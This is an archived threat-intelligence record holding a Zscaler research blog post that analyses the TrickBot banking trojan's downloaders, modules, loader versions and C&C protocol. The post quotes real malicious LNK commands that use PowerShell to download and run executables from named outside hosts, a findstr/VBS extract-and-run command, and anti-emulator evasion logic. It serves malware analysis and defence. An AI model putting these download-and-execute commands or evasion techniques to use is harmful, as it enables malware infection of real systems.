{
	"id": "7e8e98b1-879b-4037-90e4-5fa57263ec3c",
	"created_at": "2026-04-06T00:12:25.190416Z",
	"updated_at": "2026-04-10T03:20:31.145235Z",
	"deleted_at": null,
	"sha1_hash": "aeb02a18e1bd3599fe7befcc8805e17a3afc736b",
	"title": "TrickBot Emerges with a Few New Tricks | blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3637601,
	"plain_text": "TrickBot Emerges with a Few New Tricks | blog\r\nBy Abhay Kant Yadav, Atinderpal Singh\r\nPublished: 2020-04-09 · Archived: 2026-04-05 16:50:43 UTC\r\nFirst observed in 2016, TrickBot is a successor of the banking trojan Dyre and has become one of the most\r\nprevalent and dangerous malware strains in today's threat landscape, which is constantly monitored by the Zscaler\r\nThreatLabZ team. TrickBot is continually evolving as its developers add new features and tricks. It is modular,\r\nwith a main bot binary that loads other plugins capable of specific tasks, with new modules being introduced and\r\nold ones being improved at regular intervals.\r\n \r\nSolidarity with other malware\r\nTrickBot is often seen working with other types of malware, sometimes using them as an initial infection vector to\r\nfind its way into the target host or downloading other malware families to get the most out of an infection. For\r\nexample, Emotet, the rampant banking trojan, has become a major partner for TrickBot deployments. TrickBot is\r\nalso known to have deployed cryptominer payloads (Monero miner XMRIG) on infected hosts. And recently,\r\nRyuk has become the TrickBot developers’ favorite ransomware for squeezing more cash out of infections from\r\nhigh-value targets.\r\nDevelopers are now identifying high-value targets using data collected by TrickBot. Once a target is identified,\r\nthey use other tools like CobaltStrike, PowerShell Empire, PSExec, and AdFind to navigate and plant Ryuk\r\nransomware (discussed in an earlier post). Legal services and e-discovery giant Epiq Global had to take its\r\nsystems offline due to a Ryuk infection in the beginning of March 2020.\r\nThey have also developed new malware, called AnchorBot, which is based on TrickBot code and utilizes DNS as\r\nthe command-and-control (C\u0026C) medium. Unlike TrickBot, AnchorBot has not been seen in the wild using\r\nmalspam or other malware for deployment. 
It is probably a specialized version reserved for certain targets or may\r\nbe available to rent out to special customers, potentially nation-state actors. (Notably, Ryuk was attributed to\r\nNorth Korean actors based on code similarities with Hermes ransomware, but many researchers later argued that\r\nthese similarities were not conclusive.)\r\nSince almost every TrickBot infection starts with malspam containing an attached downloader or from a partner\r\nbotnet like Emotet, we will take a look at the downloaders that delivered TrickBot loaders over the last year. We have\r\nprimarily seen three types of non-executable downloaders:\r\n \r\nLNK\r\nJS\r\nDOC\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 1 of 19\n\nLNK downloader\r\nTrickBot is often spread using spam emails with attached ZIP files containing LNK (.lnk) files. We have seen\r\nLNK files with the following icons.\r\nImage 1: LNK file icons observed in the wild\r\nNames of files observed:\r\nLabel.doc.lnk\r\nPrintOnline.pdf.lnk\r\nPrint.PDF.lnk\r\nConfirmationOnline.doc.lnk\r\nReadme_Invoice_Doc.doc.lnk\r\nInvoiceAug5.doc.lnk\r\nInvoice_Print.lnk\r\nDOC080219Admission.lnk\r\nOne interesting thing is that eight out of nine LNK files had the MachineID win-jbf0q9el659.\r\nSome samples contained a PowerShell script to download a payload from the URL directly in the Link Target\r\nfield. For example:\r\n%comspec% /r \"TIMEOUT /T 5\u0026echo F|xcopy /Y /V /H %PSModulePath:~43,-8%\\p*e?s*l.e?? 
%tmp%\\Ger.exe\r\n\u0026%tmp%\\Ger \"IwR ('https://parkc.org/filetext.php') -outfile $env:temp'\\ssd.exe'\"\u0026echo pause\u0026TimEout /t \r\n3\u0026%temp%/ssd\u0026selrkekrjg\u0026dsghd\u0026sfr345jwrf\u0026\u0026e56tdsf\"\r\n/C set o=HttPs:/\u0026powershEll \"$sd=new-object\r\nsystem.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\\D.exe');\"\u0026\"%programfiles%\\wiNDows nt\\accESsorIes\\wORdpaD\"\r\nc:\\pagefIle.syS\u0026%tmp%/d\u0026J34HH\u0026E34JSH_d+\u0026df\r\nOther LNK files contain batch commands to extract and run downloader VBS code. For example:\r\n%comspec% /c copy SnJfA \u0026 (findstr \"Mydlu.*\" Label.doc.lnk \u003e \"%tmp%\\SNkBU.vbs\" \u0026 \"%tmp%\\SNkBU.vbs\")\r\n\u0026 qcpST\r\nThis uses the findstr command to locate the start of a VBS script embedded in the LNK file, saves that script in the\r\n%temp% directory, and then executes it. Here, the name of the LNK file is provided to the findstr command. That\r\nalso works as an anti-sandbox trick for some of the sandboxes that do not run files with their original names.\r\nIn these scripts we mainly observed two types of obfuscation. In the first, an obfuscated string is provided, and the script\r\nexecutes it after replacing part of it with “)+chr(“.\r\nImage 2: Code using CHR obfuscation\r\nIn the other type of obfuscation, two arrays of values are provided, and the decrypted script is built character by\r\ncharacter with arithmetic operations on array elements.\r\nImage 3: Code using arrays for obfuscation\r\nAfter decryption, the script looks the same for the LNK file as well as for the script files from the spam emails:\r\nImage 4: Decrypted downloader payload\r\nThese variations may be an attempt to bypass AV emulators. 
The malware tries to create a shortcut and save it by\r\npassing a parameter to the save method, a call that fails on a real machine. After that, it checks whether the file exists\r\nand only downloads the payload if the file has not been created, so an emulator whose save call silently succeeds never\r\nreaches the download.\r\n \r\nScript downloader\r\nThe obfuscation scripts and final downloader scripts are similar to the scripts extracted from LNK files. In these files,\r\nwe’ve seen some additional types of obfuscation along with the obfuscation seen in scripts from LNK files.\r\nImage 5: Obfuscated script\r\nImage 6: Another obfuscated script\r\nWhile in most cases the final scripts responsible for downloading the TrickBot payload were identical and not\r\nobfuscated, in one case the script was slightly obfuscated:\r\nImage 7: Decrypted downloader with slight obfuscation\r\nDocument downloader\r\nDownloaders based on Office documents were once the favorite choice of TrickBot developers. But recently, we\r\nhave seen a downtrend in macro-based document usage for TrickBot delivery.\r\nSome of the document templates we have observed during the last year are below.\r\nImage 8: Set of templates used by downloader documents to lure the end users\r\nImage 9: Another set of templates used by downloader documents to lure the end users\r\nImage 10: U.S. Employment template used by document downloaders\r\nImage 11: JP Morgan template used by document downloaders\r\n \r\nThere were different variations of documents downloading TrickBot. 
Some of the variations we observed\r\nincluded:\r\nDrop and execute JS/JSE files, which further download the TrickBot payload. The dropped script file is\r\nsimilar to the files discussed in the script downloader section.\r\nMacro code downloads and executes the payload.\r\nNo macro code in the file; the executable is embedded directly in the document as an ActiveX object and requires the\r\nuser to double-click it.\r\nImage 12: Executable directly embedded in document as ActiveX\r\nDeobfuscate and build batch commands to download the file: first create a copy of the bitsadmin binary, then\r\ndownload the payload using the copied bitsadmin file.\r\nImage 13: Commands extracted used by downloader\r\nIn other cases, it drops a BAT file containing PowerShell code to download the payload.\r\nImage 14: PowerShell encrypted and decrypted command\r\nActions used to start execution of the downloader:\r\nMacro Auto_Open()\r\nMacro Document_Open()\r\nMacro Document_Close()\r\nDouble-click by user to run ActiveX object\r\nLoader\r\nOnce it’s downloaded, the main TrickBot component, known as the TrickBot loader, begins to run. The loader acts\r\nas a banking Trojan and is also responsible for downloading various modules for specific tasks. 
TrickBot modules\r\ncome in 32-bit and 64-bit variants and, depending on the architecture of the infected system, the loader downloads and\r\nruns the corresponding modules.\r\nThe following are the TrickBot modules seen in the wild:\r\nSysteminfo - For gathering basic information on the host\r\nimportDll - For stealing data from a browser\r\ninjectDll - For injecting into banking websites to steal credentials\r\nPwgrab - For grabbing passwords from various spots\r\ncookiesDll - For stealing/grabbing cookies\r\nmailsearcher - For traversing all files on all drives in the system to harvest email addresses\r\nsharedll - For transferring over to ADMIN shares and creating persistence via services\r\nnetworkDll - For gathering system information and network/domain topology\r\nNewBCtestDll - Backconnect SOCKS5 module\r\npsfin - Point-of-Sale 'recon' module\r\nvncDll - Remote control/VNC module\r\nwormDll - For lateral movement\r\ntabDll - For spreading over SMB using EternalRomance and MS17-010\r\noutlookDll - For stealing data saved by Microsoft Outlook\r\ndomainDll - For LDAP harvesting of domain controller configuration\r\nmwormDll - For lateral movement/enumeration via LDAP and SMB exploitation\r\nmshareDll - For lateral movement/enumeration via LDAP and SMB exploitation; the mshare and mworm\r\nmodules work in cooperation\r\nrdpScanDll - New module that brute-forces Remote Desktop Protocol (RDP) logins against a specific list of victims\r\nIt downloads and injects each module into a new instance of svchost.exe. 
For each running TrickBot component\r\nthere is a corresponding instance of svchost.exe.\r\nThe latest versions of the loader that we have seen in the wild are 1087 and 1088, and the most recent config version is\r\n1000503.\r\nImage 15: TrickBot loader configuration\r\nWe looked at loader version numbers and their compilation dates, then plotted version 1058 to version 1088 with\r\ntheir corresponding compilation dates. It seems that two different versions are maintained at a time:\r\nImage 16: TrickBot loader version and compilation date timeline\r\nIt may seem that the two versions represent two botnets that are run independently, but according to our data, the\r\nC\u0026C infrastructure is shared by all versions. More than 1,400 C\u0026C IPs extracted from the TrickBot configuration\r\nwere used to draw a relationship map with loader versions.\r\nUnlike Emotet, which uses a separate first-layer C\u0026C infrastructure for different epochs, we observed no such\r\norganization in TrickBot. It shares its first-layer infrastructure between all levels, global site tags (gtags), and\r\nversions.\r\nImage 17: TrickBot loader version relationships with C\u0026C IPs\r\nSimilarly, almost all gtags in configs also share the same infrastructure or proxy infrastructure.\r\nImage 18: TrickBot gtag relation with C\u0026C IPs\r\nWith the exception of gtag mill (20mill), all others share C\u0026C infrastructure. 
\r\nImage 19: Configuration file extracted from MD5: 598bc23fc38b4712289ff5488bce2f1c containing \"20mill\" gtag\r\nC\u0026C infrastructure is shared between different levels of TrickBot infection, such as between loaders and modules\r\n(handling bots, modules, and webinjects).\r\nImage 20: Different types of configuration relationships with IPs\r\nCommunication\r\nTrickBot communicates with C\u0026C servers using GET requests and always uses numeric IP addresses as C\u0026C\r\naddresses; its port numbers are usually 443, 449, or 499. The communication always happens over SSL/TLS, but\r\nthe port can be any of the ports used by TrickBot. The TrickBot loader supports various commands that it uses to\r\ncommunicate with the C\u0026C servers.\r\nIts C\u0026C request pattern is:\r\n{server-ip:port}/{gtag}/{client_id}/{Command}\r\nSome of its interesting commands include:\r\n/0/ - initial contact format, e.g. /0/{os name}/{version}/{public ip}/{64 hex char}/{base64}\r\n/1/ - keep alive, wait for command\r\n/5/{name} - download module or injects, e.g. /5/injectDll64/, /5/dinj/\r\n/10/ - log that module/command execution has started, e.g. 
/10/62/972991/1/\r\n/14/ - profiling information or important feedback, e.g. /14/user/{username}/0/\r\n/23/{config_version} - update base config\r\n/25/ - update bot, e.g. /25/M2vzSeNWHXZ2SZI8HNKwD/\r\n/60/ - post traffic captured by injectDll\r\n/63/ - issue command to component (x), e.g. /63/injectDll/sTart/U3VjY2Vzcw==//    (‘Success’) /1/\r\n/64/ - issue command to ETERNALBLUE component (wormDll), e.g. /64/wormDll/InfectMachine/infect/\r\n/send/ - used by the mailsearcher component to POST exfiltrated email addresses\r\nIts webinject config looks like this:\r\nImage 21: TrickBot webinject configuration\r\nRecently, around the second weekend of March, TrickBot added a few new banks from Italy to its target list.\r\nConclusion\r\nThreat actors like the developers of TrickBot are becoming more and more sophisticated. TrickBot recently\r\nintroduced a new module called rdpScanDll. And, most recently, TrickBot was observed using Android malware\r\nto bypass two-factor authentication in Germany. We have not seen the use of this app for other targets, but we\r\ndon’t expect it to be long before attackers begin to use it worldwide. 
The Zscaler ThreatLabZ team proactively\r\ntracks and ensures coverage to block downloaders, payloads, webinjects, and C\u0026C activity from TrickBot and\r\nrelated malware. Because TrickBot’s C\u0026C communications occur over SSL, we strongly recommend the use of\r\nSSL inspection to detect and block TrickBot and similar threats.\r\nSource: https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks"
	],
	"report_names": [
		"trickbot-emerges-few-new-tricks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434345,
	"ts_updated_at": 1775791231,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aeb02a18e1bd3599fe7befcc8805e17a3afc736b.pdf",
		"text": "https://archive.orkl.eu/aeb02a18e1bd3599fe7befcc8805e17a3afc736b.txt",
		"img": "https://archive.orkl.eu/aeb02a18e1bd3599fe7befcc8805e17a3afc736b.jpg"
	}
}